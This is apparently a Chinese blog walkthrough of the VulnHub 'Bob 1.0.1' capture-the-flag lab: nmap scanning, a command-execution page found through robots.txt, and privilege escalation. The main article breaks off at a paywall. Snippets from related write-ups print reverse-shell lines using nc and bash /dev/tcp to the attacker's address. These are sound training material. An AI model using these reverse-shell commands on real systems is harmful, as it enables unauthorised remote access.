vulnhub Bob: 1.0.1

最新推荐文章于 2025-04-01 17:55:46 发布
原创 最新推荐文章于 2025-04-01 17:55:46 发布 · 1.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#gpg #RCE #robots.txt #ls递归

本文详细讲述了黑客通过nmap扫描、RCE漏洞利用,逐步获取反弹shell、破解密码,最终实现从www-data用户提权到root的过程,涉及渗透技巧、密码破解及系统管理知识。

渗透思路:

nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权

环境信息:

靶机:192.168.101.63

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.63

扫描到2个端口:80(http)、25468(ssh)

2、利用RCE得到反弹shell

注意到nmap扫描http端口的时候扫描到了robots.txt,其中有4个disallowed entries:

/login.php、 /dev_shell.php、 /lat_memo.html 、/passwords.html

一一访问这几个页面,发现其中http://192.168.101.63/dev_shell.php可以执行系统命令

最低0.47元/天 解锁文章
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1298
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 459
【代码】Bob_v1.0.1靶机渗透测试。
vulnhubBob_1.0.1
qq_45300786的博客
11-24 325
http://www.mamicode.com/info-detail-3079690.html https://www.jianshu.com/p/30165f430175?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
BOB: 1.0.1
Sam5ara的博客
08-15 321
直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式。
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 1245
前言 来优快云划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
Bob: 1.0.1靶场渗透测试
最新发布
sucker的博客
04-01 787
最后在/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here/notes.sh下得到密钥。bob用户被允许使用sudo命令以root权限执行所有命令,直接sudo启动一个shell。7,既然知道了其他用户的账户密码,那么就可以ssh横向移动,用户jc密码Qwerty。所以密钥就为HARPOCRATES,然后回到那个gpg文件所在的目录,进行解密。5,在命令执行漏洞的页面getshell。3,对靶机进行端口服务探测。
vulnhub_Bob 1.0.1 靶场渗透
qq_73212565的博客
11-17 343
vulnhub_bob 1.0.1
Vulnhub Bob 1.0.1靶机(渗透测试详解)
2301_78721909的博客
08-05 540
Vulnhub Bob 1.0.1靶机 渗透测试详解(from wuhu)
Vulnhub靶机 bob
菜浪马废的博客
04-28 366
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 636
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3169
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
vulnhubBob1.0.1靶机
wbplife的博客
08-05 848
解密login.txt.gpg时提示权限不够,这个账户没权限那就ssh登录到其他账户试试,前面告诉我们jc和seb账户的密码,试试。继续拼接这些目录,/dev_shell.php,是一个命令执行功能的页面,测试后发现存在过滤,并不是所有命令都可以被执行的。这里通过管道符'|'列出当前目录下的文件,发现dev_shell.php.bak,即dev_shell.php的备份文件。查看里面的文件,login.txt.gpg这是一个经过gpg加密的文件,尝试解密。在这个用户里面解密login.txt.gpg文件。
vulnhub-Bob 1.0.1靶机
wjSteve的博客
09-26 810
脚本是输出了很多文本,之前login.html里bob说把密码写在Notes里,应该就是指这个。又在bob的文档文件夹找到个gpg加密文件,下载下来,现在需要密钥。就是说有个webshell,看看/dev_shell.php。开启了三个端口,有一个未知服务,加上-A参数详细扫描一下。指出两个新的页面,先看看/lat_memo.html。试了一下找到的能运行的命令只有id,别的都被阻止了。25468是ssh服务,存在网站服务,访问。导入靶机,放在kali同一网段,扫描。网站没什么东西,登录功能也是关掉的。
VulnHub-Bob靶机详细渗透过程
MRS_jianai的博客
12-27 1551
VulnHub-Bob靶机详细渗透过程
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 2727
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
Pivoting跳板攻击与自动路由
weixin_45007073的博客
03-21 953
网络拓扑图及通信原理 我们现在假若得到了192.168.103.101的主机权限,但是我们经过收集信息发现只有该win7主机是出网的,里面还有一个网段的主机不出网,那么这时我们就要使用跳板攻击的方式访问到不出网的主机。这里我们假设出网的网段为192.168.103.0/24,不出网的数据库主机所处网段为192.168.104.0/24,我们在vmware上分别设置好这两个网段。 vmnet2之前上一章已经配置完成,vmnet3设置DHCP配置 以下分别是win7和windows server2003的网
谷歌浏览器:网址为 http://192.168.25.132:42/ 的网页可能暂时无法连接,或者它已永久性地移动到了新网址。
qq_45755030的博客
08-02 5193
访问路径中带有以下端口会直接返回服务无法访问页,具体如下: 1, // tcpmux 7, // echo 9, // discard 11, // systat 13, // daytime 15, // netstat 17, // qotd 19, // chargen 20, // ftp data 21, // ftp access 22, // ssh 23, // telnet 25, // smtp 37, // time 42, // name 43, // nicname 53, /..
linux内核调试指南
热门推荐
Hunnad的专栏
11-06 2万+
 linux内核调试指南一些前言作者前言知识从哪里来为什么撰写本文档为什么需要汇编级调试***第一部分:基础知识***总纲:内核世界的陷阱源码阅读的陷阱代码调试的陷阱原理理解的陷阱建立调试环境发行版的选择和安装安装交叉编译工具bin工具
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值